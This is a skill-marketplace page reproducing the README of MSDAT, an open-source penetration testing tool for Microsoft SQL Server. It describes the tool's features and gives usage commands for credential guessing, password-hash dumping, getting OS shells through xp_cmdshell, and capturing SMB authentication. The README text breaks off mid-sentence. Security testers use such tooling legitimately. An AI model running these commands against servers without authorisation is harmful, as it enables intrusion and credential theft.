SkillAgentSearch skills...

Msdat

MSDAT: Microsoft SQL Database Attacking Tool

GenerateConvertImprove

Install / Use

/learn @quentinhardy/Msdat
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

| Quentin HARDY | | ------------- | | quentin.hardy@protonmail.com | | quentin.hardy@bt.com |

MSDAT

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:

  • You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
  • You have a valid Microsoft SQL account on a database and you want to escalate your privileges
  • You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (e.g. xp_cmdshell, OLE Automation, Agent Jobs)

Tested on Microsof SQL database 2005, 2008, 2012, 2014, 2016 and 2019.

Changelog

  • Version 2.4 (2022/12/28) :
    • 2 new options in search module: --privs and --privs-full for getting current user roles and privileges (e.g. login and database privileges)
    • 1 new option in search module: --config for getting database configurations & information (version, databases, users, disable users, stored procecdures, etc)
  • Version 2.3 (2022/12/18) :
    • compataible with Microsoft SQL Server 2019
    • new option --schema-dump in search module for extract the schema and save in file (except for default DBs)
    • new option --table-dump in search module for extracting all tables and save in file (except for default DBs)
    • new option --sql-shell in search module for getting a minimal pseudo SQL shell
  • Version 2.2 (2022/04/29) :
    • --nmap-file and -l can be used in all module and passwordguesser module now. You can give a list of targets with -l or a nmap file with --nmap-file.
    • Multiple bug fixes
  • Version 2.1 (2020/03/04) :
    • Option --nmap-file for loading all mssql services from a XML nmap file (python-libnmap has to be installed)
  • Version 2.0 (2020/03/04) :
    • Python 2 to Python 3: MSDAT is compatible with Python 3 only now. Python 2 is not supported.
    • Separator option in password guesser module
    • Improvements in error catching in --put-file option of xpcmdshell module
    • Improvements in reverse shell option of jobs mobule
    • OLE automation module - command execution improvements
    • OLE automation module - Powershell reverse shell implemented
    • new option for printing list of agents jobs and their code: --print-jobs
  • Version 1.2 (2020/02/26) :
    • New method in xpCmdShell module: Upload a binary file with powershell (--put-file)
    • Improvement in oleAutomation: upload the file in binary mode instead of text file
  • Version 1.1 (2019/07/12) :
    • many other default credentials. Thanks to https://github.com/govolution/betterdefaultpasslist/
  • Version 1.0 (2017/02/15) :
    • first version realeased

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can (no exhaustive list):

  • get technical information (ex: database version) of a MSSQL database without to be authenticated
  • load a nnmap file for scanning all MSSQL targets
  • search MSSQL accounts with a dictionnary attack
  • test each login as password (authentication required)
  • get a windows shell on the database server with
    • xp_cmdshell
    • OLE Automation
    • Jobs
  • download files remotely with:
    • OLE Automation
    • bulkinsert
    • openrowset
  • upload files on the server with:
    • OLE Automation
    • openrowset
  • capture a SMB authentication thanks to:
    • bulkinsert
    • openrowset
    • xp_dirtree
    • xp_fileexist
    • xp-getfiledetails
  • steal MSSQL hashed password, on an any MSSQL version
  • scan ports through the database:
    • openrowset
  • execute SQL requests on a remote MSSQL server trough the database (target) with:
    • bulkinsert
    • openrowset
  • list files/directories with:
    • xp_subdirs
    • xp_dirtree
  • list drives/medias with:
    • xp_fixeddrives
    • xp_availablemedia
  • create folder with:
    • xp_create_subdir
  • search sensitive data in tables (e.g. credentials)
  • get database configuration (databases, users, stored procedures, etc)
  • extract schema and all tables information
  • exeucte basic SQL commands in a pseudo SQL shell

Installation

Some dependancies must be installed in order to run MSDAT.

In ubuntu:

sudo apt-get install freetds-dev

or download freetds on http://www.freetds.org/

Install python dependencies:

sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete

or

sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:

[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

How to begin

python3 msdat.py -h                                                                                                                                                                                                                                                    2 ⨯
usage: msdat.py [-h] [--version]
                {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                ...

               _   _  __  __   _  ___ 
              | \_/ |/ _||  \ / \|_ _|
              | \_/ |\_ \| o ) o || | 
              |_| |_||__/|__/|_n_||_| 
                        
------------------------------------------------------
 _   _  __            __           _           ___ 
| \_/ |/ _|         |  \         / \         |_ _|
| \_/ |\_ \         | o )         o |         | | 
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool 
                        
-------------------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com)

positional arguments:
  {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                        
                        Choose a main command
    all                 to run all modules in order to know what it is possible to do
    mssqlinfo           to get information without authentication
    passwordguesser     to know valid credentials
    passwordstealer     to get hashed passowrds
    xpcmdshell          to get a shell
    jobs                to execute system commands
    smbauthcapture      to capture a SMB authentication
    oleautomation       to read/write file and execute system commands
    bulkopen            to read a file and scan ports
    xpdirectory         to list files/drives and to create directories
    trustworthype       to become sysadmin with the trustwothy database method
    userlikepwd         to try each MSSQL username stored in the DB like the corresponding pwd
    search              to search in column names
    cleaner             clean local traces

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit

Examples

Modules

  • You can list all modules:
./msdat.py -h
  • When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./msdat.py all -h

You can know if a specific module can be used on a MSSQL server thanks to the --test-module option. This options is implemented in each mdat module.

all module

The all module allows you to run all modules (depends on options that you have purchased).

python msdat.py all -s $SERVER

If you want:

  • to use your own account file for the dictionnary attack
  • try multiple passwords for a user without ask you
  • to define your own timeout value
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

In each module, you can define the charset to use with the --charset option.

mssqlinfo module

To get technical information about a remote MSSQL server without to be authenticated:

./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

This module uses TDS protocol and SQL browser Server to get information.

passwordguesser module

This module allows you to search valid credentials :

./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

--force-retry option allows to test multiple passwords for each user without ask you

You can specify your own account file with the --accounts-file option:

./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

To dump hashed passwords :

./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

This modules has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module

To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

This previous command give you an interactive shell on the remote database server.

If xp_cmdshell is not enabled, the --enable-xpcmdshell can be used in this module to activate it:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shell

The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).

The *--disable-xpcm

quentinhardy

View profile

View on GitHub
GitHub Stars992
CategoryData
Updated5d ago
Forks150
quentinhardy/msdat

Languages

Python

Security Score

85/100

Audited on Mar 27, 2026

No findings